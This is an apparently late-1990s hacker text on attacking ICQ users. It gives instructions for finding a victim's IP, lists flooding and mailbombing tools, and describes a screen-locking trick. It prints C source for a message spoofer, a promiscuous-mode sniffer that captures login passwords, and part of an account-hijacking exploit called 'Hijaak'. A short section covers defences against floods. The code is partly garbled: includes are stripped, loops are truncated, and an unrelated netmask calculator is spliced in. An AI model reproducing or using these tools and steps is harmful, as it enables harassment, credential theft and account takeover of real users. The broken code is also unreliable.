<><><><><><><><><><><><><>  2 ICQ 2  BY Draco & Dead*Pool  <><><><><><><><><><><><><>

-WARNING-WARNING-WARNING-WARNING-WARNING-WARNING-WARNING-WARNING--WARNING-
|                                                                         |
| THIS TEXT CONTAINS EVERYTHING AND THEN SOME ABOUT ICQ. THE WAY I SEE    |
| IT, ALL OF THIS IS USELESS, SINCE REAL HACKING IS NOT SNIFFING YOUR     |
| BUDDY NOR FLOODING HIM; THIS IS NOTHING MORE THAN LAMERNESS.            |
| WHEN INSTALLING ICQKILLER, WATCH OUT FOR THE TROJAN CONTAINED IN THAT   |
| PROGRAM; FOR MORE INFORMATION GO TO THE TXT HOME PAGE AT                |
| HTTP://FLY.TO/TXT. THE REST IS PROFIT. HAVE FUN.                        |
|                                                                         |
-WARNING-WARNING-WARNING-WARNING-WARNING-WARNING-WARNING-WARNING--WARNING-

{[(-INTRODUCTION-)]} :

In this text we are obviously going to talk about ICQ. There really isn't anything very interesting to say about it, but a lot of people have come to ask us about it several times. ICQ is one of the best communication programs available on the Internet. It can be found at www.mirabilis.com.

{[(-INDEX-)]} :

Starting the attack
Attacking on ICQ
Defending on ICQ

{[(-STARTING THE ATTACK-)]} :

Before we can attack an ICQ user we first need to get their IP. Normally the IP would be in the "info", but ICQ 98 has an option that hides the IP (N/A). In truth, though, it doesn't hide it very well. There are several ways to get the IP even with N/A in the info. Here I'll talk about three of them:

1º) LAMER: If you want, you can download ICQ 97 (the old version of ICQ). With it the IP will never show as N/A! But that is really stupid.

2º) Offline method: This is the good way to do it. Just go offline (IN ICQ!) and the user's IP (with or without N/A) will show up in the info!!

3º) Netstat method: This one can be a bit annoying to do. While ICQ is open, open a DOS prompt and leave it open. Send a msg to the victim and, while the msg is on its way, go back to the prompt and type "netstat". This will show every connection you have running at that moment.
When you send an ICQ msg you are making a direct connection to the victim's computer, so type "netstat" and a list of IPs should appear. The guy's IP is probably among them. PC connections on ports 80 or 8080 are web pages, 21 is FTP, 23 is telnet, so none of those is his IP.

4º) ICQ sniffer: This is the best method for getting someone's IP on ICQ. Enter the user's UIN and click "sniff IP". Zam..! The IP shows up right away.

{[(-ATTACKING ON ICQ-)]} :

PROGRAMS:

To attack an ICQ user you will need a few programs. Most of the time these programs flood the ICQ, that is, the target starts receiving thousands of messages at the same time from several (or just one) UINs. This completely locks up their ICQ.

-------------------------------------------------------------------------------
 Program     : ICQbomber
 Download    : members.xoom.com/fw1/bomber.zip
 Creator     : Graffiti
 Size        : 149kb
 Description : This program bombs the user through ICQ's mail express
               system. The user will receive lots of messages, but they
               come through ICQ mail, not through random user.
-------------------------------------------------------------------------------
 Program     : icq chat flooder
 Download    : members.xoom.com/fw1/chatf.zip
 Creator     : Graffiti
 Size        : 12k
 Description : This program annoys whoever is in the ICQ chat. What it
               does is fill the chat with horns or with text. It offers
               the options Horn-Flood, Text-Flood or (Horn+Text)-Flood.
-------------------------------------------------------------------------------
 Program     : IcKiller
 Download    : members.xoom.com/fw1/ickiller.zip
 Creator     : Graffiti
 Size        : 512k
 Description : The best of all the programs for flooding ICQ. It is the
               fastest and works best. You can choose the message you want
               to send, the messages can be infinite, and you can use a
               specific UIN or random user.
-------------------------------------------------------------------------------
 Program     : Flooder
 Download    : members.xoom.com/fw1/flooder.zip
 Creator     : Phineas phreak
 Size        : 44k
 Description : Has the same function as ickiller but is less powerful,
               less fast and has fewer options.
-------------------------------------------------------------------------------

To use the two programs in the table above you have to go through a few steps:

- You must know the IP of the user you want to attack (read the "starting the attack" section for more information).
- To carry out the attack you need to connect to a port on the user's computer. The default port is 1027, but ports 1000 to 7000 can be used, so run a portscan (geocities.com/baja/2956/portscan) on the user's IP.

Done; now fill in the fields the program asks for and bomb.

USING YOUR E-MAIL BOMBER TO BOMB ICQ:

ICQ offers a system called "mail express". This system lets you send e-mails (ICQ e-mails, not real ones) to other users.
So we are going to take advantage of this system to bomb a user exactly the way a mailbomb does. A mailbomb sends lots of messages to the victim's e-mail; that is exactly what we will do, send a pile of messages to a user's ICQ. All you need is a mailbomb program (members.xoom.com/fw1/unabomb.zip) and the user's UIN. You do NOT need to have them on your list to send the messages. So set your mailbomber to bomb the following e-mail:

"UIN"@pager.mirabilis.com

Example: 3637214@pager.mirabilis.com

Done! This is exactly what ICQbomber does, only much faster.

USING A CHAT REQUEST TO LOCK UP A USER:

When you receive a chat request you get the chance to refuse it. So click decline and "enter a reason". Put a "." at the start of the message and hit "enter" until you run out of space. The decline message will come out bigger than the guy's screen and he won't be able to close it!

ICQ SPOOFER:

Here is a very "fun" little program! What it does is send messages through other users. Yeah: suppose user "A" wants to send a msg to "B", but through user "C". Then he would use this program. With it you can cause all sorts of confusion out there. hehe

FOR LINUX:

--------------Cut here
/* icqspoof.c - v2. This program sends a message to a given ICQ user and it
 * will appear to be from an arbitrary UIN. Loads of fun.
 *
 * Notes:
 * As many of you know icqflood.c has been distributed by enkil^ and irQ.
 * They claim their program is all their own work. Yet the "header" they
 * use contains MY UIN. Strange, eh?
 * A simple, "Packet Dump that we based our exploit on provided by Seth
 * McGann" would have been enough. Even though I didn't specifically
 * request credit it might have been nice to say something. In the future
 * when you expand on someone's idea and work (yeah those traces didn't fall
 * out of the sky ya know) give credit where credit is due.
 *
 * Concept, Protocol Analysis and Coding: Seth McGann
 * Some functions dealing with socket scanning: icqflood.c by enkil^ and irQ
 * With help from my roomate (target practice)
 * And yes, this still works with ICQ 98. Coming soon: Chat and File Spoofing
 */
#include
#include
#include
#include
#include
#include
#include
#include

int main(argc, argv)
int argc;
char *argv[];
{
  struct sockaddr_in sin;
  int sock,i,x,y;
  unsigned long uin;
  int Port;
  char buffer[16];
  int connected = 1;
  typedef struct icq_prot {
    unsigned char magicNum[2];
    unsigned char UIN[4];
    unsigned char unknown[4];
    unsigned char unknown2[2];
    unsigned char length[2];
    unsigned char strng[256];
  } icq_prot;
  icq_prot sendMessage;
  unsigned long temp;
  unsigned char bigguy[1024];

  if (argc != 6) {
    fprintf(stderr,"Usage: icqspoof ip SpoofedUIN message startport endport\n");
    exit(1);
  }
  Port = ScanPort(argv[1],atoi(argv[4]),atoi(argv[5]));
  if (Port == -1) {
    printf("No ICQ Port Found =(\n");
    return;
  }
  sendMessage.magicNum[0]=0x2e;
  sendMessage.magicNum[1]=0x0;
  sendMessage.unknown[0]=0x04;
  sendMessage.unknown[1]=0x01;
  sendMessage.unknown[2]=0x0F;
  sendMessage.unknown[3]=0x0;
  sendMessage.unknown2[0]=0x01;
  sendMessage.unknown2[1]=0x0;
  temp=atol(argv[2]);
  sendMessage.UIN[0]=temp & 0xFF;
  sendMessage.UIN[1]=(temp >> 8) & 0xFF;
  sendMessage.UIN[2]=(temp >> 16) & 0xFF;
  sendMessage.UIN[3]=0;
  strncpy(sendMessage.strng,argv[3],256);
  sendMessage.length[0]=strlen(sendMessage.strng)+1;
  sendMessage.length[1]=0;
  if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) {
    printf("Error: Unable to creat socket, Exiting.\n");
    exit(1);
  }
  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = inet_addr(argv[1]);
  sin.sin_port = htons(Port);
  if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))==-1) {
    printf("Error Connecting to Socket\n");
    return;
  }
  x=20;
  bigguy[0]=(41+strlen(sendMessage.strng)+1) & 0xFF;
  bigguy[1]=((41+strlen(sendMessage.strng)+1) >> 8) & 0xFF;
  bigguy[2]=sendMessage.UIN[0];
  bigguy[3]=sendMessage.UIN[1];
  bigguy[4]=sendMessage.UIN[2];
  bigguy[5]=sendMessage.UIN[3];
  bigguy[6]=0x02;
  bigguy[7]=0x00;
  bigguy[8]=0xEE;
  bigguy[9]=0x07;
  bigguy[10]=0x00;
  bigguy[11]=0x00;
  bigguy[12]=sendMessage.UIN[0];
  bigguy[13]=sendMessage.UIN[1];
  bigguy[14]=sendMessage.UIN[2];
  bigguy[15]=sendMessage.UIN[3];
  bigguy[16]=0x01;
  bigguy[17]=0x00;
  bigguy[18]=sendMessage.length[0];
  bigguy[19]=sendMessage.length[1];
  for(i=0;i

void Usage(void)
{
  fprintf (stderr, "USAGE: %s \n", MYNAME);
}

int main(int argc, char *argv[])
{
  unsigned long netmask, ipaddr, netaddr, broadcast;
  int in[4], j;
  unsigned char bc[4],na[4];

  if (3 != argc) {
    Usage();
    exit(1);
  }

  /* Check netmask */
  if (4 != sscanf(argv[1],"%d.%d.%d.%d", &in[0],&in[1],&in[2],&in[3])) {
    fprintf (stderr,"Invalid netmask \"%s\".\n", argv[1]);
    Usage();
    exit(1);
  }
  for (j=0; j<4; ++j) {
    if (in[j]<0 || in[j]>255) {
      fprintf (stderr, "Invalid octet %d in netmask \"%s\".\n", j+1, argv[1]);
      Usage();
      exit(1);
    }
  }
  netmask = in[3] + 256 * (in[2] + 256 * (in[1] + 256 * in[0]));

  /* Check IP address */
  if (4 != sscanf(argv[2],"%d.%d.%d.%d", &in[0],&in[1],&in[2],&in[3])) {
    fprintf (stderr,"Invalid IP address \"%s\".\n", argv[2]);
    Usage();
    exit(1);
  }
  for (j=0; j<4; ++j) {
    if (in[j]<0 || in[j]>255) {
      /* report the offending address, not the netmask */
      fprintf (stderr, "Invalid octet %d in IP address \"%s\".\n", j+1, argv[2]);
      Usage();
      exit(1);
    }
  }
  ipaddr = in[3] + 256 * (in[2] + 256 * (in[1] + 256 * in[0]));

  /* Broadcast address: host bits all set */
  broadcast = ipaddr | (~ netmask);
  bc[0] = broadcast / 256 / 256 / 256;
  bc[1] = (broadcast / 256 / 256) % 256;
  bc[2] = (broadcast / 256) % 256;
  bc[3] = broadcast % 256;

  /* Network address: host bits all clear */
  netaddr = ipaddr & netmask;
  na[0] = netaddr / 256 / 256 / 256;
  na[1] = (netaddr / 256 / 256) % 256;
  na[2] = (netaddr / 256) % 256;
  na[3] = netaddr % 256;

  printf ("%d.%d.%d.%d %d.%d.%d.%d\n",
          bc[0], bc[1], bc[2], bc[3], na[0], na[1], na[2], na[3]);
  exit(0);
  return 0;
}
----------------------Cut here

The text that follows was edited by Soul Hunter and taken from the nearz zine. It is published as information; we don't want to take any advantage over you (from nearz).
2º) Ickiller protect: There is a program made to "defend" against ickiller attacks! It is available at "members.xoom.com/fw1/ickillerprotect.zip". Although it works, this program has one big problem: it doesn't stop you from being bombed, it only stops the attack once it is under way. To use it, when you get bombed open the program, type in your UIN and click stop. That's it; it closes ICQ and reopens it automatically, and all the messages disappear.

3º) Firewall: The first Brazilian program to flood a user through ICQ's random user system was flooder. This program makes a client-to-client attack, that is, from you straight to the user being bombed. To do that it has to connect to a port on your computer. ICQ's default port is 1027. Most of the time it is open, and the user gets bombed through it. What we will do to defend ourselves from the flooders is to block access to those ports. For that we will use a firewall. A firewall is a program that blocks any connection to the ports you select. The one I use is the McAfee firewall (ftp://ftp.nlink.com.br/incoming/Proteção-lOgltEcH/psw102l.zip). Get the firewall and install it. Now open the firewall and go to the Rule list section. Click add. A new window opens; now you have to select the ports you want the firewall on.
Here is how your options should look (the options marked with "º" are the ones you select):

----------------------View of the program's settings---------------
 ºAll IP address
 |--RULE TYPE--|    |----LOCAL PORT SELECTION-----|
 |Allow in     |    |all ports                    |
 |allow out    |    |single port                  |
 |ºdisallow in |    |ºports from "1000" to "7000" |
 |disallow out |    -------------------------------
 ---------------
 |--PROTOCOL--|     |----REMOTE PORT SELECTION----|
 |ºtcp/ip     |     |all ports                    |
 |udp         |     |single port                  |
 --------------     |ºports from "1000" to "7000" |
                    -------------------------------
----------------------View of the program's settings---------------

Configure a new rule list like this and done! You won't receive ICQ floods anymore. But I warn you, your ICQ connection is going to be crap!! (really crap)

4º) ICQ MAILBOMBING: To keep you from being bombed we are going to block the messages from the mailexpress system. To do that open ICQ, go to the menu and then to security & privacy. A new window opens. Go to the ignore list section and select the option "Do not accept mailexpress messages". Save the changes. You will never be bombed this way again.

The text that follows was edited by Draco.

NOW that the babies have learned to use ICQ and to pull off ALL the lamer tricks in the WORLD, let's get to what really matters. The programs are in the order I put them in, that is, I give a description of ALL the programs and then I paste them.

PROGRAMS WRITTEN IN C.

A small HTML page that spoofs by means of a CGI.

SNIFFER: SNIFFS the host, don't even ask me........

HIJAAK: There I was, happily on rootshell, when I saw something really cool. A prog that grabbed the lamer's ICQ password and changed it. COOOOOOOOOOOOOLLLLLLLL, but if anyone manages to get this crap to work let me know.

THEORY: The prog scans the victim's port, knocks the target off and sniffs the server... then the guy connects, the server checks the password and the password is sniffed...
then the guy connects to the server and gets knocked off again; then, according to the theory, when the guy drops you add him with a new password... so when he comes back he no longer goes online, because you already registered him with another password.

WIN 95 ------SORRY ONLY LINUX -----HEHEHEHEHEHEHEHE

--------------HTML SPOOF

ICQ Spoofer

    IP (IP of the user who will receive the message):

    Source ICQ number of the user who supposedly sent the message (UIN):

    Message:

---------------------Cut here
----------------SNIFFER
*/
/*
 * Snoop ICQ traffic for a set host. Shows how simplistic ICQ is and
 * how easy it is to snoop it.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/*
 * PUT THE IP ADDRESS OF THE CLIENT TO SNOOP HERE OR IT WONT WORK
 */
#define MY_CLIENT_TO_WATCH 0x7F000001

static int create_socket(void)
{
  int s=socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL));
  if(s==-1)
  {
    perror("socket");
    exit(1);
  }
  return s;
}

static void close_socket(int s)
{
  close(s);
}

static void promiscuous(int s, char *iface, int onoff)
{
  struct ifreq ifr;
  strcpy(ifr.ifr_name, iface);
  if(ioctl(s, SIOCGIFFLAGS, &ifr)==-1)
  {
    perror("SIOCGIFFLAGS");
    exit(1);
  }
  strcpy(ifr.ifr_name, iface);
  if(onoff)
    ifr.ifr_flags|=IFF_PROMISC;
  else
    ifr.ifr_flags&=~IFF_PROMISC;
  if(ioctl(s, SIOCSIFFLAGS, &ifr)==-1)
  {
    perror("SIOCSIFFLAGS");
    exit(1);
  }
}

static __inline__ ip_p(unsigned char *packet, int len)
{
  if(packet[12]==0x08 && packet[13]==0x00)
    return 1;
  return 0;
}

struct icqhdr
{
  unsigned char version[2] __attribute((packed)); /* ?? */
  unsigned short command __attribute((packed));
  unsigned short sequence __attribute((packed));
  unsigned long uid __attribute((packed));
  unsigned char data[0];
};

struct icqack
{
  unsigned char version[2] __attribute((packed)); /* ?? */
  unsigned short result __attribute((packed));
  unsigned short sequence __attribute((packed));
  unsigned char data[0];
};

struct icqstring
{
  unsigned short len;
  char data[0];
};

struct icqlogin
{
  struct icqhdr hdr __attribute((packed));
  unsigned long dunno __attribute((packed)); /* 000006FE.L */
  unsigned short pw_len __attribute((packed));
  unsigned char pw_data[11] __attribute((packed));
  struct in_addr addr __attribute((packed));
  /* Rest is a mystery right now */
  /* 0.L */
  /* 2.L */
  /* 0000004C, 00000000 */
  /* 00 78 */
};

static void print_icq_string(struct icqstring *s)
{
  fwrite(s->data, s->len-1, 1, stdout);
}

/*
 * Scan a packet for clues
 */
static int process_packet(struct sockaddr *sa, unsigned char *packet, int len)
{
  int i;
  int lv;
  int d=0;
  static long num=0;
  struct iphdr *iph;
  struct udphdr *udphdr;

  if(strcmp(sa->sa_data,"eth0"))
    return 0; /* Wrong port */
  if(!ip_p(packet, len))
    return 0;
  iph=(struct iphdr *)(packet+14);
  udphdr=(struct udphdr *)(iph+1); /* assume no options */
  lv=ntohs(udphdr->len);
  if( udphdr->source !=htons(4000) && udphdr->dest!=htons(4000))
  {
    return 0;
  }
  /* printf("packet %d \r", ++num);*/
  if(iph->saddr==htonl(MY_CLIENT_TO_WATCH))
  {
    printf("To Server: %d bytes\n", lv);
  }
  else if(iph->daddr==htonl(MY_CLIENT_TO_WATCH))
  {
    printf("From Server: %d bytes\n", lv);
    d=1;
  }
  else
    return 0;
  i=14+sizeof(struct iphdr);
  if(len-i>lv)
    len=i+lv;
  i+=sizeof(struct udphdr);
  /* printf("UDP size %d\n",i);*/
  if(i>=sizeof(struct icqhdr)+sizeof(struct udphdr))
  {
    struct icqhdr *p=(struct icqhdr *)(udphdr+1);
    if(d==0)
    {
      printf("From %ld\n",p->uid);
      printf("Version: %d.%d\nCommand ", p->version[1], p->version[0]);
      switch(p->command)
      {
        case 0x000A:
          printf("Ack");
          break;
        case 0x03E8:
        {
          struct icqlogin *il=(struct icqlogin *)p;
          printf("Login Password ");
          print_icq_string((struct icqstring *)&il->pw_len);
          printf(" IP %s", inet_ntoa(il->addr));
          break;
        }
#if 0
        case 0x0x??
        {
          struct in_addr v=*(struct in_addr *)p->data;
          printf("Ping %s", inet_ntoa(v));
          break;
        }
#endif
        case 0x409:
        {
          printf("Ping");
          break;
        }
        case 0x0438:
        {
          struct icqstring *s=(struct icqstring *)p->data;
          printf("Disconnect (");
          print_icq_string(s);
          printf(")");
          break;
        }
        case 0x0456:
        {
          /* data +4,5 is always 0100 */
          struct icqstring *s=(struct icqstring *)(p->data+6);
          printf("Message to %ld ", *((long *)p->data));
          print_icq_string(s);
          break;
        }
        case 0x0460:
        {
          printf("Information %ld on ID %d", *((short *)p->data), *((long *)(p->data+2)) );
          break;
        }
        case 0x046A:
        {
          printf("Information_2 %ld on ID %d", *((short *)p->data), *((long *)(p->data+2)) );
          break;
        }
        case 0x04D8:
        {
          printf("Status ");
          switch(*((long *)p->data))
          {
            case 0x00: printf("[Away 0]"); break;
            case 0x01: printf("[Away 1]"); break;
            case 0x10: printf("[DND 0]"); break;
            case 0x11: printf("[DND 1]"); break;
            default: printf("%04X", *((long *)p->data));
          }
          break;
        }
        default:
          printf("%04X", p->command);
      }
      if(p->sequence)
        printf("\nSequence %d\n", p->sequence);
      else
        printf("\n");
    }
  }
  if(i>=sizeof(struct icqack)+sizeof(struct udphdr))
  {
    struct icqack *p=(struct icqack *)(udphdr+1);
    if(d==1)
    {
      printf("Version: %d.%d\nReply ", p->version[1], p->version[0]);
      switch(p->result)
      {
        case 0x000A:
          printf("Ack");
          break;
        case 0x00E6:
          printf("Away Reply ");
          printf("for %ld", *((long *)p->data));
          break;
        case 0x0118:
        {
          struct icqstring *is;
          printf("InfoID %d\n", *((short *)p->data));
          printf("ICQ ID %ld\n", *((long *)p->data+2));
          is=(struct icqstring *)(p->data+6);
          printf("Nick ");
          print_icq_string(is);
          is=(struct icqstring *)(((char *)is)+is->len+2);
          printf("\nName ");
          print_icq_string(is);
          is=(struct icqstring *)(((char *)is)+is->len+2);
          printf(" ");
          print_icq_string(is);
          is=(struct icqstring *)(((char *)is)+is->len+2);
          printf("\nEMail ");
          print_icq_string(is);
          is=(struct icqstring *)(((char *)is)+is->len+2);
          printf("\nInfo ");
          print_icq_string(is);
          break;
        }
        default:
          printf("%04X", p->result);
      }
      if(p->sequence)
        printf("\nSequence %d\n", p->sequence);
      else
        printf("\n");
    }
  }
  while(i=32 && c< 127)
        printf("%c", c);
      else
        printf(".");
    }
    printf("\n");
    i+=8;
  }
  printf("\n");
  fflush(stdout);
  return 0;
}

int main(int argc, char *argv[])
{
  int s;
  unsigned char buf[1600];
  struct sockaddr sa;
  int salen;
  int len;

  s=create_socket();
  promiscuous(s, "eth0", 1);
  while(1)
  {
    salen=sizeof(sa);
    if((len=recvfrom(s, (char *)buf, 1600, 0, &sa, &salen))==-1)
    {
      perror("recvfrom");
      close_socket(s);
      exit(1);
    }
    process_packet(&sa, buf,len);
  }
  printf("An error has occured.\n");
  close_socket(s);
  exit(0);
}
---------------------Cut here

--------------------HIJAAK
/* . ICQ Hijaak
 . Version 1C
 .
 . Author: wumpus@innocent.com
 . Copyright (c) 1998 Wolvesbane
 .
 . By downloading or compiling this program, you agree to the terms of this
 . license. If you do not agree with any of these terms you MUST delete this
 . program immediately from all storage areas (including browser caches).
 . (A) You agree not to use this program in any way that would constitute a
 .     violate of any applicable laws. This may included federal laws if you
 .     live in the United States and similar laws regarding computer security
 .     in other countries.
 . (B) You agree to hold the authors (referred to collective as Wolvesbane)
 .     harmless in any damages that result due to your possession or use of
 .     this software.
 . (C) Wolvesbane does not claim that this program implements any functions.
 .     As the saying goes, "You get what you pay for." -- And you didn't pay
 .     anything for this.
 . (D) This software is FREE for _NON-COMMERCIAL_ use. You may not use this
 .     program for any commercial use (or any other activity which makes you
 .     money with the assistance of this program ). The author is not
 .     interested in commercial use of this program (and cannot think of what
 .     commercial use would consist of ).
 . (E) This program was created using Linux with IP-Masquerading to run the
 .     ICQ program unmodified and without any dissassembly. The testing
 .     was done with volunteers, and with a second computer logged into the
 .     ICQ network. No ICQ users were harmed in the creation or testing of
 .     this program.
 . (F) This copyright applies only to the code written by Wolvesbane, and not
 .     to anything included under Fair Use.
 . (G) Please note that if you use ANY sections of this code in your work,
 .     (which I expressly allow as long as it is NON-COMMERCIAL), you are
 .     obligated to give me some credit in your comments (if it is a source
 .     file ) or in a string constant if it is a binary file. If you do not
 .     wish to do so, you may NOT include ANY portion of this file in your
 .     own work.
 */

/*
 * UPDATES, for May 31, 1998
 *
 * I notified Mirabilis about this bug about a month ago (which from
 * what I recall is the semi-official delay to allow a fix ).
 * In that time, Mirabilis has gone from DLL 1.22 to DLL 1.26. This
 * exploit has been tested again 1.26 and still works. *ooops*!
 * This exploit has rather simplistic UDP scanning code... if it doesn't
 * work (ie, against .se hosts ), then you can't hijaak them. Sorry, but
 * I just don't care enough.
 *
 * Lastly, even a Windows user can get anyone's IP from ICQ by sending a
 * message to their UIN, and doing a netstat.
 *
 * With the acquistion of Mirabilis and the ICQ protocol by AOL, I will
 * no longer be playing with the ICQ protocol. Prior to that actual event
 * you might contact me with questions on this program.
 */

/*
 . I am indebted to the author of ICQSNIFF.C, for his clear description of
 . the ICQ protocol (although it has since changed). And for the idea as
 . well.
 .
 . Some information came from anonymous sources and Usenet postings which
 . I didn't jot down the author. I apologize to any author who sees his/her
 . ideas in here. None of this code was "stolen".
 .
 */

/* To quote Arik:

Arik Vardi (arik@ICQ.COM)
Mon, 15 Dec 1997 13:55:16 -0500

Thanks for the vote of confidence.
Actualy, we don't publish the protocol since it's a work in progress and
we still have pretty major changes from version to version. Password
encryption will be addressed in the next client release, spoofing client
messages has already been addressed in our new version - ICQ98a, (which is
not what you are using) and should not be possible once we phase out older
clients (hopfuly by the end of this month).
We apreciate your pointing out vulnrabilities to us and will do our best
to fix them in future releases.
*/

/*
 . Guess what, Arik. You *lied* about fixing spoofing -- and this proves it.
 */

#include
#include
#include
#include
#include
#include
#include
#include /* for AF_INET */
#include
#include
#include

int MultiResolve( char * hostname, int * addr_count, struct in_addr ** addresses );

enum { FAILURE = -1, SUCCESS = 0 };

/*=========================================================================*/
typedef unsigned short int u16;
typedef unsigned long int u32;
typedef unsigned char u8;
/*=========================================================================*/

#define byte(v,o) (*((u8 *)(&(v))+(o)))
#define word(v,o) (*((u16 *)((unsigned char *)(&(v))+(o)) ))
#define dword(v,o) (*((u32 *)((unsigned char *)(&(v))+(o)) ))

unsigned char icq_check_data[256] = {
  0x0a, 0x5b, 0x31, 0x5d, 0x20, 0x59, 0x6f, 0x75,
  0x20, 0x63, 0x61, 0x6e, 0x20, 0x6d, 0x6f, 0x64,
  0x69, 0x66, 0x79, 0x20, 0x74, 0x68, 0x65, 0x20,
  0x73, 0x6f, 0x75, 0x6e, 0x64, 0x73, 0x20, 0x49,
  0x43, 0x51, 0x20, 0x6d, 0x61, 0x6b, 0x65, 0x73,
  0x2e, 0x20, 0x4a, 0x75, 0x73, 0x74, 0x20, 0x73,
  0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x22, 0x53,
  0x6f, 0x75, 0x6e, 0x64, 0x73, 0x22, 0x20, 0x66,
  0x72, 0x6f, 0x6d, 0x20, 0x74, 0x68, 0x65, 0x20,
  0x22, 0x70, 0x72, 0x65, 0x66, 0x65, 0x72, 0x65,
  0x6e, 0x63, 0x65, 0x73, 0x2f, 0x6d, 0x69, 0x73,
  0x63, 0x22, 0x20, 0x69, 0x6e, 0x20, 0x49, 0x43,
  0x51, 0x20, 0x6f, 0x72, 0x20, 0x66, 0x72, 0x6f,
  0x6d, 0x20, 0x74, 0x68, 0x65, 0x20, 0x22, 0x53,
  0x6f, 0x75, 0x6e, 0x64, 0x73, 0x22, 0x20, 0x69,
  0x6e, 0x20, 0x74, 0x68, 0x65, 0x20, 0x63, 0x6f,
  0x6e, 0x74, 0x72, 0x6f, 0x6c, 0x20, 0x70, 0x61,
  0x6e, 0x65, 0x6c, 0x2e, 0x20, 0x43, 0x72, 0x65,
  0x64, 0x69, 0x74, 0x3a, 0x20, 0x45, 0x72, 0x61,
  0x6e, 0x0a, 0x5b, 0x32, 0x5d, 0x20, 0x43, 0x61,
  0x6e, 0x27, 0x74, 0x20, 0x72, 0x65, 0x6d, 0x65,
  0x6d, 0x62, 0x65, 0x72, 0x20, 0x77, 0x68, 0x61,
  0x74, 0x20, 0x77, 0x61, 0x73, 0x20, 0x73, 0x61,
  0x69, 0x64, 0x3f, 0x20, 0x20, 0x44, 0x6f, 0x75,
  0x62, 0x6c, 0x65, 0x2d, 0x63, 0x6c, 0x69, 0x63,
  0x6b, 0x20, 0x6f, 0x6e, 0x20, 0x61, 0x20, 0x75,
  0x73, 0x65, 0x72, 0x20, 0x74, 0x6f, 0x20, 0x67,
  0x65, 0x74, 0x20, 0x61, 0x20, 0x64, 0x69, 0x61,
  0x6c, 0x6f, 0x67, 0x20, 0x6f, 0x66, 0x20, 0x61,
  0x6c, 0x6c, 0x20, 0x6d, 0x65, 0x73, 0x73, 0x61,
  0x67, 0x65, 0x73, 0x20, 0x73, 0x65, 0x6e, 0x74,
  0x20, 0x69, 0x6e, 0x63, 0x6f, 0x6d, 0x69, 0x6e
};

#define MAX_NUM_ADDRESSES 255

int Resolve( char * hostname, struct in_addr * addr )
{
  struct hostent * hinfo;

  (void)memset( (void *)addr, 0, sizeof( struct in_addr ));
  if ( inet_aton( hostname, addr) )
    return SUCCESS;
  if ( !(hinfo = gethostbyname( hostname ) ) )
    return FAILURE;
  (void)memcpy( (void *)addr, (void *)hinfo->h_addr, sizeof(struct in_addr ));
  return SUCCESS;
}

int MultiResolve( char * hostname, int * addr_count, struct in_addr ** addresses )
{
  int host_count;
  int i;
  char * p;
  struct in_addr address;
  struct hostent * hinfo;

  if ( inet_aton( hostname, &address ) )
  {
    p = (char *)malloc(sizeof(address));
    if ( !p )
    {
      fprintf(stderr,"MultiResolve: Allocation failed!\n");
      return FAILURE;
    }
    (void)memcpy((void *)p,(void *)&address, sizeof(address) );
    *addr_count = 1;
    *addresses = (struct in_addr *)p;
    return SUCCESS;
  }
  if ( !(hinfo = gethostbyname(hostname) ) )
    return FAILURE;
  if ( hinfo->h_length != sizeof( struct in_addr ) )
  {
    fprintf(stderr,"MultiResolve: h_length (%d) not equal "\
            "to size of struct inaddr (%d) ",
            hinfo->h_length, sizeof(struct in_addr) );
    return FAILURE;
  }
  host_count = 0;
  for (i = 0; i < MAX_NUM_ADDRESSES; i++ )
  {
    struct in_addr *
    addr_ptr;
    addr_ptr = (struct in_addr *)hinfo->h_addr_list[i];
    if ( !addr_ptr )
      break;
    host_count++;
  }
  p = (char *)malloc( host_count * hinfo->h_length );
  if ( !p )
  {
    fprintf(stderr,"MultiResolve: Failed to allocate %d bytes\n",
            host_count * hinfo->h_length );
    return FAILURE;
  }
  *addresses = (struct in_addr *)p;
  for ( i = 0; i < host_count; i++ )
  {
    (void)memcpy( (void *)p,(void *)hinfo->h_addr_list[i], hinfo->h_length );
    p += hinfo->h_length;
  }
  *addr_count = host_count;
  return SUCCESS;
}

#define IP_VERS 0
#define IP_TOS 1
#define IP_TOTLEN 2
#define IP_ID 4
#define IP_FLAGS 6
#define IP_TIMETOLIVE 8
#define IP_PROTOCOL 9
#define IP_CHECKSUM 10
#define IP_SRC 12
#define IP_DST 16
#define IP_END 20

#define UDP_SOURCE 0
#define UDP_DEST 2
#define UDP_LENGTH 4
#define UDP_CHECKSUM 6
#define UDP_END 8

#define UCHDR_SOURCE 0
#define UCHDR_DEST 4
#define UCHDR_PROTOCOL 9
#define UCHDR_UDPLEN 10
#define UCHDR_END 12

#define ICMP_TYPE 0
#define ICMP_CODE 1
#define ICMP_CHECKSUM 2
#define ICMP_END 4

u16 cksum( u16 * buf, int numWords )
{
  u32 sum;

  sum = 0;
  while ( numWords -- )
  {
    sum += *(buf++);
  }
  sum = ( sum >> 16) + ( sum & 0xffff );
  sum += ( sum >> 16 );
  return ~sum ;
}

void make_ip_hdr( u8 * packet, int length, u8 protocol, u16 id, u16 flags,
                  struct in_addr me, struct in_addr you, u8 ttl )
{
  memset( packet, 0, IP_END );
  byte(*packet, IP_VERS ) = 0x45;
  word(*packet, IP_TOTLEN ) = htons( length );
  byte(*packet, IP_TIMETOLIVE ) = ttl;
  byte(*packet, IP_PROTOCOL ) = protocol;
  word(*packet, IP_ID ) = htons( id );
  word(*packet, IP_FLAGS ) = htons( flags );
  dword(*packet,IP_SRC ) = *((u32 *)&me);
  dword(*packet,IP_DST ) = *((u32 *)&you);
  word(*packet, IP_CHECKSUM ) = cksum( (u16 *)packet, IP_END/2 );
}

void make_udp_hdr( u8 * packet, int udplength, u16 sport, u16 dport )
{
  u8 * udp;
  static u8 chdr[UCHDR_END];
  u32 pchecksum;

  memset( chdr, 0, UCHDR_END );
  udp = packet + ( ( byte(*packet, IP_VERS ) & 0x0F ) * 4 );
  memset( udp, 0, UDP_END );
  word(*udp, UDP_SOURCE ) = htons( sport );
  word(*udp, UDP_DEST ) = htons( dport );
  word(*udp, UDP_LENGTH ) = htons( udplength );
  memcpy( chdr + UCHDR_SOURCE, packet + IP_SRC, 8 );
  byte( *chdr, UCHDR_PROTOCOL ) = byte( *packet, IP_PROTOCOL );
  word( *chdr, UCHDR_UDPLEN ) = word( *udp, UDP_LENGTH );
